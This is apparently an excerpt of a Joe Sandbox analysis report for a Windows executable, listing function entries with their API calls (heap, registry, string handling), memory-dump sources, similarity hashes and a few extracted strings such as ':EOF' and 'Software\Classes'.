• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
• Instruction ID: 68242c7f73a1e28ee12accdd80cf1cb6a6e5109442b3a9715bd70b2b59e4ad35
• Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
• Instruction Fuzzy Hash: E121BEB6A1CB45D1EA48BF04E880369B3A4FB88B95F500136DA9D827B6DF7DE454D700
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B574AD6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B574AEF
  • Part of subcall function 00007FF64B574A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A28
  • Part of subcall function 00007FF64B574A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A66
  • Part of subcall function 00007FF64B574A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A7D
  • Part of subcall function 00007FF64B574A14: memmove.MSVCRT(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A9A
  • Part of subcall function 00007FF64B574A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574AA2
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B57EE64
• RtlFreeHeap.NTDLL(?,?,?,00007FF64B568798), ref: 00007FF64B57EE78
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
• String ID:
• API String ID: 2759988882-0
• Opcode ID: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
• Instruction ID: f1af5193f340c2c7f981b4df830a0231ca804c334c856d6df8422f8a10a0f2c1
• Opcode Fuzzy Hash: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
• Instruction Fuzzy Hash: 05F0E761B1DB42C6EE18BF66E404178EAE1EF8EB41F48D434CD2EC2362EE7CA5458710
APIs
  • Part of subcall function 00007FF64B56CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56B9A1,?,?,?,?,00007FF64B56D81A), ref: 00007FF64B56CDA6
  • Part of subcall function 00007FF64B56CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF64B56B9A1,?,?,?,?,00007FF64B56D81A), ref: 00007FF64B56CDBD
• wcschr.MSVCRT ref: 00007FF64B5911DC
• memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF64B58827A), ref: 00007FF64B591277
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: Heap$AllocateProcessmemmovewcschr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 4220614737-381716982
• Opcode ID: bd83934b9501f045900d4cea0c34526f969d72289539c66b600af79ca04ff41e
• Instruction ID: dc1a4a19d59ebf6b269b8b0803f1eb344b771883ee2996f306fcb1ce8c5bbd42
• Opcode Fuzzy Hash: bd83934b9501f045900d4cea0c34526f969d72289539c66b600af79ca04ff41e
• Instruction Fuzzy Hash: E571B7B1A0C252D9EB68BF15E440679F6A4FB9C795F404236C96DC7BB6CF3CA4518B00
APIs
  • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706D6
  • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706F0
  • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B57074D
  • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B570762
• longjmp.MSVCRT ref: 00007FF64B57CCBC
• longjmp.MSVCRT(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57CCE0
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
• String ID: GeToken: (%x) '%s'
• API String ID: 3282654869-1994581435
• Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
• Instruction ID: 5105584362beb2cf897bddbf296d011b5ef99a62a1cf1149c48e09764e1d626e
• Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
• Instruction Fuzzy Hash: AF61DF61B0E64282FA1CBF21E45427DA3A0AF5CBA4F545935CA3D8B6F7EE7CE4418700
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: memmovewcsncmp
• String ID: 0123456789
• API String ID: 3879766669-2793719750
• Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
• Instruction ID: 04f40218c2ec25c9f78f491eed9afa60a510a8a2e74731e22fdd077f67fceba5
• Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
• Instruction Fuzzy Hash: 8641D762F1C786C1EA29BF36D4002BAA395FB4CB90F485531DE6E877A6DE3CD4418780
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B5897D0
  • Part of subcall function 00007FF64B56D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D46E
  • Part of subcall function 00007FF64B56D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D485
  • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D4EE
  • Part of subcall function 00007FF64B56D3F0: iswspace.MSVCRT ref: 00007FF64B56D54D
  • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D569
  • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D58C
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B5898D7
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\Classes
• API String ID: 2714550308-1656466771
• Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
• Instruction ID: eecd0ad035f943be5a88bdadabd257ea16ea512f8233cc222c99b115a574e78f
• Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
• Instruction Fuzzy Hash: 21418D22A1D75281EA48FF16E445039B3A4FB98BD0F509131DA6E877F2DE39D866C740
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B58A0FC
  • Part of subcall function 00007FF64B56D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D46E
  • Part of subcall function 00007FF64B56D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D485
  • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D4EE
  • Part of subcall function 00007FF64B56D3F0: iswspace.MSVCRT ref: 00007FF64B56D54D
  • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D569
  • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D58C
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B58A1FB
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\Classes
• API String ID: 2714550308-1656466771
• Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
• Instruction ID: a8d07fe793d3de4a16bbbd54b779132cd17869ea3c505c89b5033615dece291b
• Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
• Instruction Fuzzy Hash: 20417E22A1DB5681EA09BF15D445439B3A5FF887D0F508131DA6EC77B2DF39E866C340
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleTitle
                                                                              • String ID: -
                                                                              • API String ID: 3358957663-3695764949
                                                                              • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                              • Instruction ID: 97607d27210d06bb0214de47598f7365e320c65ed2444f9d920f60ae82478c47
                                                                              • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                              • Instruction Fuzzy Hash: DA315921B0C64286EA18BF11E800078FBA4AB4DB90F589135CA2E97BF7DFBCE451C754
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsnicmpswscanf
                                                                              • String ID: :EOF
                                                                              • API String ID: 1534968528-551370653
                                                                              • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                              • Instruction ID: ccfdc26da83cba094993acb69bd07c56163d0e53fa5a2907f84d35fa56c07227
                                                                              • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                              • Instruction Fuzzy Hash: 45315C71B0CA4286EA6CBF15F8402B8B6A0EF4DB50F448131DA6D862B6DF6CE841C640
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsnicmp
                                                                              • String ID: /-Y
                                                                              • API String ID: 1886669725-4274875248
                                                                              • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                              • Instruction ID: 29f653c6ec309a224caf529fdde8cc4d518c7214cfeb0afd5cfe9fe6507ab40c
                                                                              • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                              • Instruction Fuzzy Hash: 66213065E0C65681FA18BF0AD540178B6A0BF4DFC0F449031EE6D977A6EE3CE492D700
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706D6
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706F0
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B57074D
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B570762
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcess
                                                                              • String ID:
                                                                              • API String ID: 1617791916-0
                                                                              • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                              • Instruction ID: c76aac582b3a4af72e1242357b8117bbac1635542fa95e2f4f3ed9ab42ef5d39
                                                                              • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                              • Instruction Fuzzy Hash: 22414D72A0D64286EA5CBF64E44057AB7E0EB4DB40F588035C66E837A2DF7CA545CB40